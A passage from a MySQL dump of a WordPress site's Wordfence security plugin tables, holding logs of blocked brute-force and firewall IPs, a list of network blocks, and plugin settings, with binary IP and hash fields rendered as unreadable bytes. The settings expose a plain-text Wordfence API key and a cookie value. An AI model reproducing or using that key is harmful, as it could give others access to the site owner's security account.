7,'brute'),('\0\0\0\0\0\0\0\0\0\0���a�S','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���m~','SG',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0���q��','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���q�','US',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0���q�','US',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0���q��','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���q��','US',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���q��','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���q٤','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���q٤','US',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���q٤','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��Щ^�','KY',1,18852,'waf'),('\0\0\0\0\0\0\0\0\0\0���;��','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���k�?','US',1,18839,'waf'),('\0\0\0\0\0\0\0\0\0\0���~\r�','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���~P�','US',1,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0����O','US',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0����O','US',6,18841,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','MV',6,18845,'waf'),('\0\0\0\0\0\0\0\0\0\0����v�','US',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����v�','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���\rKz','CN',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���\rKz','CN',2,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���\rKz','CN',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���9�8','ID',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0����q�','VN',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0���PK','VN',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�','VN',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�','VN',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0���@','TW',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���sAk','KR',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0���sAk','KR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����V�','KR',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����V�','KR',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0����','KR',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���!�9','RU',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���!�9','RU',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0���0B�','GB',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���n\\�','MK',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���n\\�','MK',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0����_','DE',4,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��ՈLB','DE',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��ՈLB','DE',2,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��ՈLB','DE',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ո]�','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��Օg�','ME',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��Օg�','ME',1,18850,'brute'),('\0\0\0\0\0\0\0\0\0\0��Օg�','ME',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��ի�)','IT',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n��','IN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0���\n��','IN',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���%*2','US',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0���¬�','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0����zR','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���	�','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y0','RU',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y0','RU',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y0','RU',2,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���F��','FR',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���q\0�','AM',2,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��ٓ�','GE',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��٠�','DE',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��ٮ�i','GB',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��ٮ�i','GB',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��ٮ�i','GB',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��ٶ��','FR',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��ܧe','CN',1,18844,'brute'),('\0\0\0\0\0\0\0\0\0\0��ܧe','CN',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��ܧe','CN',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0��ܧe','CN',2,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��ܧe','CN',1,18848,'brute'),('\0\0\0\0\0\0\0\0\0\0��ܧe','CN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��ݏ0','KR',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��ݏ0�','KR',1,18840,'brute'),('\0\0\0\0\0\0\0\0\0\0���Mo�','CN',1,18836,'waf'),('\0\0\0\0\0\0\0\0\0\0���MW','VN',1,18851,'brute'),('\0\0\0\0\0\0\0\0\0\0��߸}','IN',1,18848,'waf');
/*!40000 ALTER TABLE `wp_wfblockediplog` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfblocks7`
--

DROP TABLE IF EXISTS `wp_wfblocks7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblocks7` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) unsigned DEFAULT 0,
  `blockedHits` int(10) unsigned DEFAULT 0,
  `expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
  `parameters` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `type` (`type`),
  KEY `IP` (`IP`),
  KEY `expiration` (`expiration`)
) ENGINE=InnoDB AUTO_INCREMENT=2590 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfblocks7`
--

LOCK TABLES `wp_wfblocks7` WRITE;
/*!40000 ALTER TABLE `wp_wfblocks7` DISABLE KEYS */;
INSERT INTO `wp_wfblocks7` VALUES (2554,2,'\0\0\0\0\0\0\0\0\0\0����%+',1629802471,'Blocked by Wordfence Security Network',1629802471,1,1629803071,NULL),(2555,2,'\0\0\0\0\0\0\0\0\0\0�����',1629833614,'Blocked by Wordfence Security Network',1629833614,1,1629834214,NULL),(2556,2,'\0\0\0\0\0\0\0\0\0\0��Օg�',1629836200,'Blocked by Wordfence Security Network',1629836200,1,1629836800,NULL),(2557,2,'\0\0\0\0\0\0\0\0\0\0��H�.�',1629840877,'Blocked by Wordfence Security Network',1629840877,1,1629841477,NULL),(2558,2,'\0\0\0\0\0\0\0\0\0\0��k�g�',1629841514,'Blocked by Wordfence Security Network',1629841514,1,1629842114,NULL),(2559,2,'\0\0\0\0\0\0\0\0\0\0��N�(�',1629842523,'Blocked by Wordfence Security Network',1629842523,1,1629843123,NULL),(2560,2,'\0\0\0\0\0\0\0\0\0\0��k���',1629842853,'Blocked by Wordfence Security Network',1629842853,1,1629843453,NULL),(2561,2,'\0\0\0\0\0\0\0\0\0\0���ּ',1629843500,'Blocked by Wordfence Security Network',1629843500,1,1629844100,NULL),(2562,2,'\0\0\0\0\0\0\0\0\0\0��H�.�',1629844550,'Blocked by Wordfence Security Network',1629844550,1,1629845150,NULL),(2563,2,'\0\0\0\0\0\0\0\0\0\0���VK�',1629844913,'Blocked by Wordfence Security Network',1629844913,1,1629845513,NULL),(2564,2,'\0\0\0\0\0\0\0\0\0\0����',1629845263,'Blocked by Wordfence Security Network',1629845263,1,1629845863,NULL),(2565,2,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�',1629845580,'Blocked by Wordfence Security Network',1629845580,1,1629846180,NULL),(2566,2,'\0\0\0\0\0\0\0\0\0\0�����',1629848023,'Blocked by Wordfence Security Network',1629848023,1,1629848623,NULL),(2567,2,'\0\0\0\0\0\0\0\0\0\0��gV�]',1629849102,'Blocked by Wordfence Security Network',1629849102,1,1629849702,NULL),(2568,2,'\0\0\0\0\0\0\0\0\0\0���֣%',1629849833,'Blocked by Wordfence Security Network',1629849833,1,1629850433,NULL),(2569,2,'\0\0\0\0\0\0\0\0\0\0��?�)',1629850186,'Blocked by Wordfence Security Network',1629850186,1,1629850786,NULL),(2570,2,'\0\0\0\0\0\0\0\0\0\0�����',1629851295,'Blocked by Wordfence Security Network',1629851295,1,1629851895,NULL),(2571,2,'\0\0\0\0\0\0\0\0\0\0��}:w�',1629851638,'Blocked by Wordfence Security Network',1629851638,1,1629852238,NULL),(2572,2,'\0\0\0\0\0\0\0\0\0\0������',1629852024,'Blocked by Wordfence Security Network',1629852024,1,1629852624,NULL),(2573,2,'\0\0\0\0\0\0\0\0\0\0���\n5	',1629852754,'Blocked by Wordfence Security Network',1629852754,1,1629853354,NULL),(2574,2,'\0\0\0\0\0\0\0\0\0\0���֖]',1629853503,'Blocked by Wordfence Security Network',1629853503,1,1629854103,NULL),(2575,2,'\0\0\0\0\0\0\0\0\0\0���KG�',1629854263,'Blocked by Wordfence Security Network',1629854263,1,1629854863,NULL),(2576,2,'\0\0\0\0\0\0\0\0\0\0��Kw��',1629854645,'Blocked by Wordfence Security Network',1629854645,1,1629855245,NULL),(2577,2,'\0\0\0\0\0\0\0\0\0\0��/J�',1629855420,'Blocked by Wordfence Security Network',1629855420,1,1629856020,NULL),(2578,2,'\0\0\0\0\0\0\0\0\0\0���[h�',1629855803,'Blocked by Wordfence Security Network',1629855803,1,1629856403,NULL),(2579,2,'\0\0\0\0\0\0\0\0\0\0����8',1629856982,'Blocked by Wordfence Security Network',1629856982,1,1629857582,NULL),(2580,2,'\0\0\0\0\0\0\0\0\0\0��ψ.',1629858555,'Blocked by Wordfence Security Network',1629858555,1,1629859155,NULL),(2581,2,'\0\0\0\0\0\0\0\0\0\0��O���',1629858962,'Blocked by Wordfence Security Network',1629858962,1,1629859562,NULL),(2582,2,'\0\0\0\0\0\0\0\0\0\0���\0�D',1629859355,'Blocked by Wordfence Security Network',1629859355,1,1629859955,NULL),(2583,2,'\0\0\0\0\0\0\0\0\0\0���Q֨',1629859723,'Blocked by Wordfence Security Network',1629859723,1,1629860323,NULL),(2584,2,'\0\0\0\0\0\0\0\0\0\0����',1629860516,'Blocked by Wordfence Security Network',1629860516,1,1629861116,NULL),(2585,2,'\0\0\0\0\0\0\0\0\0\0������',1629862975,'Blocked by Wordfence Security Network',1629862975,1,1629863575,NULL),(2586,2,'\0\0\0\0\0\0\0\0\0\0���Z�_',1629864197,'Blocked by Wordfence Security Network',1629864197,1,1629864797,NULL),(2587,2,'\0\0\0\0\0\0\0\0\0\0��Kw�\r',1629865027,'Blocked by Wordfence Security Network',1629865027,1,1629865627,NULL),(2588,2,'\0\0\0\0\0\0\0\0\0\0���@vs',1629865415,'Blocked by Wordfence Security Network',1629865415,1,1629866015,NULL),(2589,2,'\0\0\0\0\0\0\0\0\0\0��}��',1629867417,'Blocked by Wordfence Security Network',1629867417,1,1629868017,NULL);
/*!40000 ALTER TABLE `wp_wfblocks7` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfconfig`
--

DROP TABLE IF EXISTS `wp_wfconfig`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfconfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfconfig`
--

LOCK TABLES `wp_wfconfig` WRITE;
/*!40000 ALTER TABLE `wp_wfconfig` DISABLE KEYS */;
INSERT INTO `wp_wfconfig` VALUES ('actUpdateInterval','2','yes'),('addCacheComment','0','yes'),('adminUserList','b:0;','yes'),('advancedCommentScanning','1','yes'),('ajaxWatcherDisabled_admin','0','yes'),('ajaxWatcherDisabled_front','0','yes'),('alertEmails','','yes'),('alertOn_adminLogin','1','yes'),('alertOn_block','1','yes'),('alertOn_breachLogin','1','yes'),('alertOn_firstAdminLoginOnly','0','yes'),('alertOn_firstNonAdminLoginOnly','0','yes'),('alertOn_loginLockout','1','yes'),('alertOn_lostPasswdForm','1','yes'),('alertOn_nonAdminLogin','0','yes'),('alertOn_scanIssues','1','yes'),('alertOn_severityLevel','25','yes'),('alertOn_throttle','0','yes'),('alertOn_update','0','yes'),('alertOn_wafDeactivated','1','yes'),('alertOn_wordfenceDeactivated','1','yes'),('alert_maxHourly','0','yes'),('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml','yes'),('allowed404s6116Migration','1','yes'),('allowHTTPSCaching','0','yes'),('allowLegacy2FA','0','yes'),('allowMySQLi','1','yes'),('allScansScheduled','a:0:{}','yes'),('apiKey','af964636dfaaded3ec83b30fa59c20ecc3a2bbb377c2be3ad6fbb7cd392bcabae18493a704b0ba81ac4ca6a0d35e16ad40a53d5d0882ca0b98ea4b2e2c0e27621d77b1711cd98b407d2b8311868e312a','yes'),('autoBlockScanners','1','yes'),('autoUpdate','0','yes'),('autoUpdateAttempts','0','yes'),('bannedURLs','','yes'),('betaThreatDefenseFeed','0','yes'),('blockCustomText','','yes'),('blockedTime','300','yes'),('blocks702Migration','1','yes'),('cacheType','disabled','yes'),('cbl_action','block','yes'),('cbl_bypassRedirDest','','yes'),('cbl_bypassRedirURL','','yes'),('cbl_bypassViewURL','','yes'),('cbl_cookieVal','60d1bc81587a5','yes'),('cbl_loggedInBlocked','','yes'),('cbl_redirURL','','yes'),('cbl_restOfSiteBlocked','1','yes'),('checkSpamIP','1','yes'),('config701Migration','1','yes'),('config720Migration','1','yes'),('coreHashes','�\0\0\0\0\0\0\0\Z��a:2:{s:4:\"hash\";s:64:\"c947153e029a74c6d8d1caa85e4aec46022fe0152ffb1dfc23ea508d9e9fe9c4\";s:6:\"hashes\";s:136448:\"\0���W7���ht#�	��q��)��d��$\0��\0(�띰xJ{�h�Ϯ�%��\r^��:��(�5��\0(����Z�Y�Y�@�Iq��ȗ#��T��@\04ߗ�t��\\v�Q�޹��\'_���ajx�Ҧ�\0E=j���ȋ|�p8.�½���֤��SGp�\0Eq�x����Pa���>bv�D��o4V�G;a<��\0^N��弘a�e|K��-��ܰ��ɜ=�\0b�&F�����%|w��*Qr;�|/�=(A���<�\0���#�B�5��j��$#��j!����bN��j�\0�ۧ��4(�K�I|���0��qD.^�v�\0�>|�;(߯\\W*�7?��\n�N��2=�7[Uo\0��i��ք�\"����]�^��XD��2](\0���/��o)��:4]��_���+̔�c���\0�e�*�@�t���\"��q	ȐN��5��H�\0�9�w�i����5�������}���h��\0�Z̈�~�0�=��G�#�C��Z}�*��p\0�T|̅_��S�8��O0μ�¸0����6�\0��-bs�G�\n(hr\Z.�n���!e��z.Yx��U�i��5G���$P�u�v�AT����p�l�J��}���a\Z�\0VX=:��8~\"2�ʦD�I�XV�f�EW��e���G�]���q)6��	�j��nNؤ^}0[P�KXs��+ȉa�w�S���[�U`|WS�PD�羟Nh��b!���#�8i�>kq6�R�E�5��:�\"��;B��i.qX��A4����uU��+ױ���ϱ��T�_^gy�zG�L\"1����U}6:��l|��(㜦��q{��V�~u�<�Dh�o*���cϬ0���x�cl$�	�4��m����o��`vA:����`{rf��_�S3/s��m�?d�^͔0�X0�#q��-ml�*��#T�c��x�E��ƒy�ũ��H���>��$�2��]�%��*�6�\\�dp�ۛ!��s%��]Z�Y�o�ݿ���������r;G�\"��Gu���&�w]�-H�\rRW��\\�5����\'��=�P�����sZF�ԤoD-x?�<�u���q�XQ�7ai�\rIC�pE�K����y��k�ѩ}ˣ�\\�$�p\"�&�p+^���\Z�{�����˜�5�|�f�㵅S�L�o3E�x���ѥU��q�`�q4u���Z����[n�8�O��r7��0H01YL$RRAhJ6��M�w:/�7�.�ڏP���h.B�U-ї�\'Ts��z+p����pHa�P0�4��D�!�2�{�F�͹|���p8$�h��\"d�3���\\��pY�Q�ᣎ�K4ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V�M�˻yUL���K��C�Wa��\\��ˁ�\n�;�0�Ġ\"f�АΟ��\'\r͍��D�dM������s�ǿ��ڴ�$2�j)�,\n�\' #6�9\n����ږ��mK�2�e�f�te�4���\Z�GG.�f��Vy`��)\".o[`�ϐ�\r�n���jn�viU\n@,�+!%u	re4�+JuP$,�WN��P�2�\"Ş�,|^��y޲���/\Z(A�1]�/ƅ�B�M�j:��@ѫ�G+S�f�����dV�i�\n�6W��ԑ\\<�O�Ej2�Q����\r�|�X6�����/46�J���?���X�GX�~��u���ic\r�p�����Q��활��\r?c�L�Tӊ���qg�ȫ?c�r�ȸ�t�d���B\rTJ�,Q��$�TDh���((Zd�z��vO����_��;ƀ��E�pY�.�&}��_�	�Q�������oS�nn�̵v�\0)�������Ӥ�:DILV�\0y�Z��)��K�\n��ܘD�~��%Ro��c��7�\r��L��>1�݈]�^]�RɢNF�M��J�,��i�I.2 ��>1�Z�;ר��1ԁ$�!��W:	�Sx�Dq5��/w��_W:��+f�1z��g���\\Y��m�x�GO0���jo].㖽�B�=�f~:N���Fa6�ա�\nY ���\'��i���+�`��fGYbm��UP��M��J�ڡ0�&Cv��M�$����O��4-K�	o6�lb�1E�;�7x�?�-�DZ��Z�zE���*�nk���E�m@������1s��Y�#1$��\Z�=I�����b��XBr�?���ͥ-�!�i�>�[��e�V{�W�!F�P�b<&„A����8�`��]wB�κ��@kp&���h4ԛ�2����f\'�G���IS��}�}R⥅�JЛZ[`�m��I�$=�����D��֛&�Ǿ@�+բ��qO.���x&��*p���@��l����Β/kz=�i���� S����\Z\Z4ڶ1�5���2�3\r#?E�Q���L��Im$�Z��B\Z�!��&�͖��Ck�`7���\'/��]�i��5�\0�����2SC���+2��f!Og�ve�C�h����%%��-��)^\\���\0�t`�k��@���U�OŔ�cp��>�!8HB6������=�b���!��n�z\0�OS~K��|$��T����lJ�b�Ow������f\nT����Eg\ZU�\r����l{��SYD7I�.`��Ï}#٧���JKN��e�ӌ��&��ЎuѡIq�t���n~T	_j��-����%��?�7�0i���}�e�iZ�O�&E+rX�e�{e��mX��<�:�KSy{��r�>K^s�VS2o�H֏�_��)7�����z_oe���ŭy�^/?h;@r�K%��LP��f��c�(|�_]��U�͒o~ME��������s��Rp�d��F[��\'r�5l���蔝媀���s��@Z2]��i���](J~n�3��ϝ�ـ�hj��q�o�2��kL��JQ�c\0�8|V��A�����Nں�)\r�m�MA���D��os,����$���gJ	�Ŗ�7l}�a�������w|�gRLh!���1�R�&\'��k�D\':8YިK�Aa�-�RH�T���������(:�=ߤ\'\\�\0���|�8�(��]x�Z���vJ+�~�S�$ً6��vg�Aќ�ʋQ?�j�`J��N�]�0&��b�\0�V?9�����\"�.�I3�2r)rk�+`�NiM��2]<�	�h\n�˥���O��3�5F���\\�\0���,vS��+p\n�.����\r�J*RT	�!��A&��U�B�tG=_:\\�]>i��?η@ڹ�aKպ�*��Խ+]���ҮgƉ^62�G��\r�S��|�;)�$=X�n!����l=�@�A����:�V56U�x5�Px���&�:V�V��-qX��A9�M�4��-����t\n{���}�MI	AE0N������.T0b([���������oYd��%� �+�[�B��� f�<3)|���y-�d�����]`,5��l9�o���x��;����xZ���q@���51a�Ix���MOY�U�\r�Z�t�Kϭ�uJOyŹ�&Ҹ��*�ܲ�us#��t1��#4����䂹\Z��\'&�8�\0������m9;:��ͼ�f��f�)���I�;��Poi���=�DᎯ�0Sl�hsgܺ{�,��)\Z|����<�\n�x��*����i����`��h��`�P��*ͤ�!j1m!�~�J��\r�O�]��Y<�y�}�\Z�>ɺH���I|��P�����Bb��e�^��Έ;VT1��cj�] k^�O��9�A9�/�\Z�%�@b�.�`�� po��df��?�jr��Y��e|�H��h>�,�ec���R�es5-���D=��<��:3��ϩ�M���>���r�6�Ԥ��%z�uۇ7�}�F���[yx��]k��ݭ�Yr����9�IV,C2�\"���V�l��p�]l2�P�f>�Kp��֚J���bvw�`���*�w��}����*ʘ��)>2�q��e��^�)�P����n�GfR�@Ol,>iv�:�`�tQ�*�8\'�<��\n����J���;�H`�Q؝6pq���a�%��\r��	��\"�A�n�3H�Is�:Y��a�e0BҲy�Pp\nﭾ�����!Λ���&��Ʌ\'M��4�B�S���+\'�4&�$ء��Vgg��o��g~��m/�/&t+���s�����\"#:Z�ܯ4㓉&_&���6\"xF�|w`AZ_+vL\r}��N�P���6������_��Ұ�ݾ��l2�b���qÜ$U�v��	l,s���\"\r�m��`��Yד�U��X^�Ms���6R�H@�	&�冾�B�x��@d�R#U��O�Pg��sH�o�)n��Wr��t�Z�M���?%���V���D��Fv�@�����*9V���μ�[E��Bu}<�\Z#�d�4*�?���d�Q]Bx.|9D��:h@��Q��/U\0-|_ۢ1�g-�+����}�Ԙ!^iB���J��\\W�]�f��@@�w�=	.]��kZ1љm�G���]�x�0���	14\"1�Ix��GL�[	���>(G�A:���	64���� �2DM�M�$�\r澐i�\0���	8\\Ŭ�j�A��ʔ5�+X���o�T�m�_|	M��yu$�1�ck_�K�o�f��m���%�	g)[.�r\n�o�i�{4��Q\n\r8H�\rfX��	v�l���ٮ�!��P��m���\n6|ϔK	~�C�ȫ��7���:��s&u����j��t	�+�{R���ل���n�t,�Ǟ�`���|U�	�	��#t�̹��p=�I\"����)F	֓���-�\nqU��i���-�$�h*��m�l	�Vh���LC��»>U�8.�`�@<K��h	�Ϳ��U%�O�Hޡ�@�~x\\6��~�\n<�:�X�h�QAT����o��p2���8>�\n*��<��ӳ�?HM��\'V���L�\'[R�\n�@&��[DqS�������B��N#F�B��\n*An���.]�B��t�v�!�WҧMw�9�F\n+P_tQ�Vo����7n�\nz#�8�����J\nGk��~ng��m.�3\\�\n��1i��jgָ�\nv�?�u�	���f�h6�2B���?�2\03�}�\nx��m���nV=OD��\0T���)��U��\n}.�����v�e�\n�?�.z��E����+ɡ\n��\\_9(�)7�\n��/�S��\'�g߃�v���\n�9d���g��~@���|�B-�����ڐ�6=��\n�T�[Cp����(,�_V+�L\rۨI��(.��\n�s�H��чc �-y//�?�\r�$M̤j3\n�aqYK�JҔ΀p�\ZJ�j��\\P���\n�\n��ڷ�tn�\r�Ean�J;}(��ҙ���.��9\n�X:��Q�}�+�O�\\�_�	{�ܓC\'a�y:��\n�� �W\"���w�\05�S Nr������h\n�C��0�pFd���l�\0��\"u�~2\"�T��p\Z\n�v�[\0���XZppi�.��c�;~&���\n���&�)h4�_`�F�L��<��:`#pf���\n����RW#ވ� �Q��ē4E[�\'�z�\r��)��k���O�dS0�X�z���_����61k��K(��]1�z�ukpR�!������YC8���`dfh�.^8����!{��F�N�L{��z�)��,�\"�w�W�S��JDz���K�S����uᾒ�M��cc���cdD�(�Q��\\�\ra�[�J?T���?��G�d��(s������t�BUI+u���C�����R����SF2>�3`��v��\'�:js(��-N���֠����N�3����:�VS;���CT\n��]���C�rJ�2����m5CZ�\0�/@@1�1�D�ծ6��8g\n)e���z��l�1�MH��&��S��.>�U�B|2��ӜOU}��(԰�tc�2��ĒZV�R�顃[��l#4���>1ε��E���l|lh�����]���:�Yň�3	����\\gm̻�1)q+#���b�^0rR_Ҳ��Yn,��J�����́�T�NB�(�-��g��\\ICڞ�:r�n�̿�>Tw�D\n�Q�!�@iD��r��ȭ!wz��L{��J�y7-�m���G鴞Y�[����k��En#Xv�i�w�R��:�M�7K�kR��D����.�� L9��%�S���J*����n\'ͪt^���Vɹ�O�����*�(�����7Y��(V��z|%\0\'j����l���ص�$h�TC���՞N�8k�Ⱥ��y�*�<I\n����(���x�$���C\n��m�-B�����YVAlͼ2�VS�#n���X����6��X����DU�T�=��1O�@�,x�������� �)���\r�&�d5�s/,�\"�d��w22���\r��މ#<*Q�f��(�����\r%�P����cW�-:\'2�U�\'Ft�ݩz\r1?�;IB�=S��\Z�2֥͐�&�׆Z�B���\r5C�ٖ��N��s��k��l�\'t35����\rN��I�Y�����ԯ!���6)��I�Y\rQi�^�\ZB|��f��C���-/r��U�Y٢�B\rX�[cdpSs3�%.X��|A���w��#(JL\ra�{p�9����(A�)ˡ�̮SPV��s�6�#i\rnu���:Ft\Z��\"P9���qP���R��PA�\r���k�<vW�P�v��g(Hт��c�+d7\r�Y�t�W^���}rIxۯ�u��$�/dMk�\r�U��:�w����,���&�K�p&�\Z���\r�7Gٛ�r�Xyl�ﳠ<U5p8�n��\r›��Xd	D\n����q�bc�\Zu��\rٓ��C7,��<��p�,�L��~rY�s#�\r�\"�(qq�6�ZN��������ş&�h��\r�\n���*J��6������V^��%W\\�y�\'�h?I��I��3z(B�GQ#��`p�S:eJ�&�/�ʝ�aɋ��`�\n�}��\Z\\x�+�G\\%R���O��6���}�㕓悫�-�F�kRV��6���G_e\r��\"�}�Q^u�����YtY���sNl�dU|�7��t�U�FY���n�a�IWRH�j�wHBB����u�Xp\0b�Ue�$OrΰYe�JX�p�W	!��L�	o�Ѧ�?��11����]�Q[��7*�a�3�Ǿ�h��,�U���c�\\�ki����6u��J\n3*��Kv�i��A�&�4���=�D��q!蓸֧f;4��P�Z��e�O!�vx.e��8�jY�����0\Z����P�P1��S/���0�?�U!�͝�������6�??��Z��v�w=2H:�)x.���o\\��J��t�LU��o���L��~��)6�K�5S$ʂ8����⡧5g�g7�3lsuؾ�y���Z�wڠ�0YE\0����身i\\���|�����7��wq��;,r���L�X������\\35qv.R߼h<<���t�hD�$��\\1l$y�,��`p�M��j]#�W�B�Tm����F�M�(�b;ˏ�K���g�&\n�-��nzEja �#�[՝YdIdf@\\�K2o��؂/*�~�Hw�c@�2��,�����P�0������x`Ձ���dZvs�.��k�����\Z�5�\0��yX��$�j뤋��I��8���@t=��{9v��>:̷M\Z�ϵ����\rBt�\r�����3��i��0bn��j:�$L �g��r�a���������t��C �Y�\n��H���$$�T�̞}^�pfO]�ǭN3�%\r\\��-�A�J�K��K���7P�xe�\'�PH���H�P=,���L���N��}�\Z�E�O\\0�u��FOR\Z)ā���;S�\'bN<v�w�LSڻ�sT���|�>Q����i}�G�D���7��OF5�B�Nov���:A�_-3��x\ZJ�B�@k�y50���\n��Q�(��;�4�.���`R��w�|lS�Pp�k�G�M�8�����Թ��f�E�x;˝���O�[����J`uO�v&_���-]����E��;|��x$���(�t`\"���/\Z=�`>&�oR�֫��	�ڲ��}�Z	w�%��(�4)�;\r��;�)6qi9C��2��t�d64�Kծ�A�U)۳!���Pdlw�+���>�;��O��-L��hy��ML)\\VH��3_@AJ!�_��drN�d�G��;�Ϸ�6�<���wj�;�V��4dk�Է܏>�D��j�,p��k~*����d}�[����H�?�iK�[�i��/�(����^��\\���4��c-��Ȝ��)�͗�۷���@c.�V_;q���:uM���X���bW��Z`��E�ض\r�S��ky��%�/�-��u_EC�?o�Tg�NLC\"M�61ɿ�\\�)�j�i����]�m��b�#���6��C2���ao�2ᨁF���ˁL�W���%\rVJ~�p��$���P(��q��\0�RS�;\rs�}��o%��XOwR	�\\��B�;z����b#�q���l��E��S�WD��Lex��骴@m!��~���|d�ET9v,�Wы���ʀKK��#\0��f�羀G�~��p��oPq�9��\rbL\\9�2׬��n�*PP�\0A�w�:oH�RR�ES�G��ʏT-�a*Qf�,S�7��q��̓<�U*\";b�r���^�&��7j�Fő����ұy�ZA\"�Y�!�	=��x�`Jߩi.�?w~�/\"w�U{���Lf׏1:դy;�&ۆ޹[rD��b�Nv��㤄��\n�\Zwr��kHuE����N�/�JY���g�Si��)�N]o���}�0<��,���eS</�ܓ8C��T2I�UX�jF�\rPJ6�\\�d$Se=g�����۝JްS�0��il�ww�4�:����\"D�����=[��Z��\r���#�A@�f3�1_<���v����(QN��YCwo����}z�/�+x����\Z8��3�����ۀT�ё/��*�2^�oܰ�\n�0��\0��1�x?F(�8���V����/`8�І�Œ��t�2�:�]XK%�	EL��償�t�~�nF�^m���KY�N��\"�� �t�hR�D�P�>(�F-�$>Q���A*0l[U[����A7�E�OxƟ�:Y��{�� 